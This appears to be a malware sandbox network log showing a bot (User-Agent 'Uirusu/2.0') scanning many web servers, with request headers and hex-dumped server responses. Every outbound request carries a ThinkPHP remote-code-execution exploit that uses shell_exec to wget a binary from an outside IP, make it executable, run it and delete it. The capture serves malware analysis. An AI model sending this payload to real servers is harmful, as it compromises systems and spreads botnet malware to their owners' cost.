                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        872192.168.2.143770295.164.1.20580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:56.522911072 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:56.723014116 CET578INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:56 GMT
                                                        Server: Apache/2.4.41 (Ubuntu)
                                                        X-Frame-Options: DENY
                                                        X-Content-Type-Options: nosniff
                                                        Content-Length: 328
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 76 6d 32 30 38 32 37 31 34 2e 73 74 61 72 6b 2d 69 6e 64 75 73 74 72 69 65 73 2e 73 6f 6c 75 74 69 6f 6e 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at vm2082714.stark-industries.solutions Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        873192.168.2.145914495.100.66.11280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:56.526720047 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:56.730770111 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:34:56 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:56 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 62 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 36 39 36 26 23 34 36 3b 34 63 30 31 37 63 62 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;9b7a7b5c&#46;1707899696&#46;4c017cbe</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        874192.168.2.143517695.100.58.6880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:56.532975912 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:56.743314028 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:34:56 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:56 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 37 66 39 30 61 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 36 39 36 26 23 34 36 3b 31 33 37 34 30 38 36 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;77f90a17&#46;1707899696&#46;13740867</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        875192.168.2.145073495.216.179.16380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:56.541316986 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:56.759601116 CET338INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:34:56 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        876192.168.2.144467895.86.120.2280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:56.695497036 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        877192.168.2.1459778112.127.121.16280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:58.329437971 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:58.693078995 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:35:57 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        878192.168.2.145810488.125.177.14380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:58.529757977 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:58.758426905 CET985INHTTP/1.1 200 OK
                                                        Date: Wed, 14 Feb 2024 08:34:59 GMT
                                                        Server: Apache
                                                        P3P: policyref="/w3c/p3p.xml",CP="NON COR CURa OUR NOR NAV"
                                                        Keep-Alive: timeout=15, max=2000
                                                        Proxy-Connection: Keep-Alive
                                                        Cache-Control: no-cache, max-age=0
                                                        Expires: Wed, 14 Feb 2024 08:34:59 GMT
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 57 65 65 7a 6f 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 69 64 3d 22 63 73 73 4c 69 6e 6b 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 74 68 65 6d 65 73 2f 63 6f 6d 6d 6f 6e 2e 63 73 73 3f 76 3d 56 34 2e 33 2e 30 26 61 6d 70 3b 74 68 65 6d 65 3d 25 32 46 74 68 65 6d 65 73 25 32 46 6c 69 74 65 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 70 68 70 42 72 6f 77 73 65 72 3d 22 6f 74 68 65 72 22 2c 62 42 72 6f 77 73 65 72 3d 22 44 65 66 61 75 6c 74 22 2c 61 70 70 54 79 70 65 3d 22 56 42 22 2c 69 73 4d 6f 62 69 6c 65 3d 30 2c 61 70 70 56 65 72 73 69 6f 6e 3d 22 56 34 2e 33 2e 30 22 2c 75 73 65 72 4c 6f 67 67 65 64 3d 30 2c 63 6c 69 65 6e 74 43 61 70 53 65 74 3d 30 2c 77 69 6e 46 72 61 6d 65 73 3d 31 2c 70 69 6e 67 49 6e 74 65 72 76 61 6c 3d 38 30 30 30 2c 50 48 50 5f 53 45 4c 46 3d 22 2f 69 6e 64 65 78 2e 70 68 70 22 2c 72 49 44 3d 22 22 2c 77 53 65 73 73 69 6f 6e 5f 69 64 3d 22 22 2c 69 73 41 70 70 3d 30 2c 73 69 6d 70 6c 65 4d 6f 64 65 3d 30 2c 6e 6f 50 6f 70 75 70 3d 30 2c 69 6d 67 46 61 64 65 53 74 65 70 73 3d 35 2c 64 72 61 67 4e 4c 61 75 6e 63 68 54 68 72 65 73 68 6f 6c 64 3d 31 30 30 2c 64 72 61 67 4e 4c 61 75 6e 63 68 46 72 69 63 74 69 6f 6e 3d 30 2e 30 30 35 2c 6c 6f 61 64 69 6e 67 49 63 6f 6e 55 52 4c 3d 22 2f 67 66 78 2f 6c 6f 61 64 69 6e 67 2e 67 69 66 22 3b 6e 6f 41 73 79 6e 63 4a 53 45 72 72 6f 72 3d 30 3b 0a 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><title>Weezo</title><link id="cssLink" rel="stylesheet" type="text/css" href="/themes/common.css?v=V4.3.0&amp;theme=%2Fthemes%2Flite" /><script type="text/javascript">var phpBrowser="other",bBrowser="Default",appType="VB",isMobile=0,appVersion="V4.3.0",userLogged=0,clientCapSet=0,winFrames=1,pingInterval=8000,PHP_SELF="/index.php",rID="",wSession_id="",isApp=0,simpleMode=0,noPopup=0,imgFadeSteps=5,dragNLaunchThreshold=100,dragNLaunchFriction=0.005,loadingIconURL="/gfx/loading.gif";noAsyncJSError=0;</script></head>
                                                        Feb 14, 2024 09:34:58.776626110 CET1286INData Raw: 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 61 69 6e 46 72 61 6d 65 42 6f 64 79 20 6c 6f 67 69 6e 42 6f 64 79 20 63 6f 76 65 72 66 6c 6f 77 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 22 20 6f 6e 6c 6f
                                                        Data Ascii: <body class="mainFrameBody loginBody coverflow" style="background-image:none" onload="setTimeout('lPreload()',100)"><NOSCRIPT><div class="textShadow" style="font-size:200%;margin-top:30%;width:100%;text-align:center"><img src="/gfx/alertBig.pn
                                                        Feb 14, 2024 09:34:58.776647091 CET1286INData Raw: 27 2b 65 2e 73 69 7a 65 2b 27 22 20 69 64 3d 22 27 2b 64 2e 69 64 2b 27 22 20 73 74 79 6c 65 3d 22 27 2b 65 2e 73 74 79 6c 65 2b 27 22 3e 3c 62 20 69 64 3d 22 63 31 22 3e 3c 2f 62 3e 3c 62 20 69 64 3d 22 63 32 22 3e 3c 2f 62 3e 3c 62 20 69 64 3d
                                                        Data Ascii: '+e.size+'" id="'+d.id+'" style="'+e.style+'"><b id="c1"></b><b id="c2"></b><b id="c3"></b><img src="'+e.altImg+'" style="'+e.style+'"></canvas>';if(e.parentNode){if(dgi(d.id)){$(d.id).e.remove()}e.parentNode.innerHTML=b}else{d.doc.write(b)}va
                                                        Feb 14, 2024 09:34:58.776658058 CET1280INData Raw: 2e 73 74 61 72 74 2b 65 2e 64 69 72 2a 64 2e 61 41 6e 67 6c 65 3b 62 2e 61 72 63 28 64 2e 77 2f 32 2c 64 2e 68 2f 32 2c 65 2e 72 2a 64 2e 62 77 2c 61 2c 61 2b 4d 61 74 68 2e 50 49 2a 32 2d 65 2e 6f 70 41 6e 67 6c 65 2c 66 61 6c 73 65 29 3b 62 2e
                                                        Data Ascii: .start+e.dir*d.aAngle;b.arc(d.w/2,d.h/2,e.r*d.bw,a,a+Math.PI*2-e.opAngle,false);b.stroke()},setPerc:function(a){this.circles[1].opAngle=Math.PI*2*(1-a)}};</script><script type="text/javascript">loadA.start({size:100}); loadA.setPerc(0.2);
                                                        Feb 14, 2024 09:34:58.776668072 CET92INData Raw: 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 63 6f 6d 6d 6f 6e 2e 6a 73 3f 76 3d 56 34 2e 33 2e 30 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 3e
                                                        Data Ascii: <script src="/js/common.js?v=V4.3.0" type="text/javascript" language="javascript"></script>
                                                        Feb 14, 2024 09:34:58.779879093 CET1286INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 6e 62 47 72 6f 75 70 73 3d 32 2c 75 64 53 4e 3d 30 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 69 6e 70 75 74 20 69 64 3d 22 6e 6f 46
                                                        Data Ascii: <script type="text/javascript">var nbGroups=2,udSN=0;</script><input id="noFocus" style="position:absolute;top:-20px"><script src="/js/loginCoverflow.js?v=V4.3.0" type="text/javascript" language="javascript"></script><script src="/js/
                                                        Feb 14, 2024 09:34:58.779894114 CET1286INData Raw: 20 76 6f 74 72 65 20 6e 6f 6d 20 6f 75 20 76 6f 74 72 65 20 70 73 65 75 64 6f 6e 79 6d 65 3c 62 72 3e 0d 0a 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 73 69 7a 65 3d 22 32 30 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30
                                                        Data Ascii: votre nom ou votre pseudonyme<br><input type="text" size="20" style="width:100%" id="loginPseudoInput"><br><br><center><a class="button" href="javascript:void(0)" onclick="loginPseudoSubmit(dgi('loginPseudoInput').value);" style="margi
                                                        Feb 14, 2024 09:34:58.779902935 CET1286INData Raw: 0d 0a 09 7d 2c 0d 0a 09 27 72 65 76 6f 6b 65 27 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 77 6c 2e 61 73 72 2e 73 65 6e 64 28 27 66 61 63 65 62 6f 6f 6b 41 63 63 6f 75 6e 74 52 65 76 6f 6b 65 3d 31 27 29 7d 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d
                                                        Data Ascii: },'revoke':function(){wl.asr.send('facebookAccountRevoke=1')}}</script><script type="text/javascript">var loginFacebookUserId;function loginFacebook(userId){loginFacebookUserId=userId;WFacebook.connect()}function loginFaceboo
                                                        Feb 14, 2024 09:34:58.779957056 CET1286INData Raw: 64 29 3f 70 77 64 3a 27 27 3b 0d 0a 09 73 74 61 72 74 45 6e 63 72 79 70 74 69 6f 6e 28 29 3b 0d 0a 7d 0d 0a 66 75 6e 63 74 69 6f 6e 20 6c 6f 67 55 73 65 72 42 79 4e 61 6d 65 28 6e 61 6d 65 2c 70 77 64 29 7b 0d 0a 09 64 67 69 28 27 75 73 65 72 27
                                                        Data Ascii: d)?pwd:'';startEncryption();}function logUserByName(name,pwd){dgi('user').value=name;dgi('userId').value='';dgi('password').value=(pwd)?pwd:'';startEncryption();}function forceMobile(){D.location.href=D.location+((D.loca
                                                        Feb 14, 2024 09:34:58.779969931 CET1286INData Raw: 73 70 6c 61 79 3d 22 62 6c 6f 63 6b 22 3b 0d 0a 09 73 65 74 54 69 6d 65 6f 75 74 28 22 70 72 6f 63 65 65 64 45 6e 63 72 79 70 74 69 6f 6e 28 29 22 2c 31 30 29 3b 0d 0a 7d 0d 0a 66 75 6e 63 74 69 6f 6e 20 70 72 6f 63 65 65 64 45 6e 63 72 79 70 74
                                                        Data Ascii: splay="block";setTimeout("proceedEncryption()",10);}function proceedEncryption(){var msg=D.loginForm.elements["password"].valuevar now=new Date();RSACrypt("ip="+ip+"/"+msg+"/ts="+(ts+(Date.parse(now.toGMTString())-loadTs)/1000+
                                                        Feb 14, 2024 09:34:58.779980898 CET1286INData Raw: 22 2f 67 66 78 2f 69 63 6f 6e 73 2f 6d 6f 73 61 69 63 32 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 4e 61 6d 65 22 20 69 64 3d 22 63 61 70 74 30 22 3e 55 74 69 6c 69 73 61 74 65 75 72 3c 2f 64 69 76
                                                        Data Ascii: "/gfx/icons/mosaic2.jpg" alt=""><div class="loginName" id="capt0">Utilisateur</div></div><div id="l1" class="loginItem"><img onload="fade(this)" src="/gfx/icons/7x7.jpg" alt=""><div class="loginName" id="capt1">Public</div></div><div id="lo


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        879192.168.2.144466488.99.9.21280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:58.534348011 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:58.739420891 CET450INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:58 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        880192.168.2.144704688.221.0.11880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:58.553270102 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:58.777463913 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:34:58 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:58 GMT
                                                        Connection: close
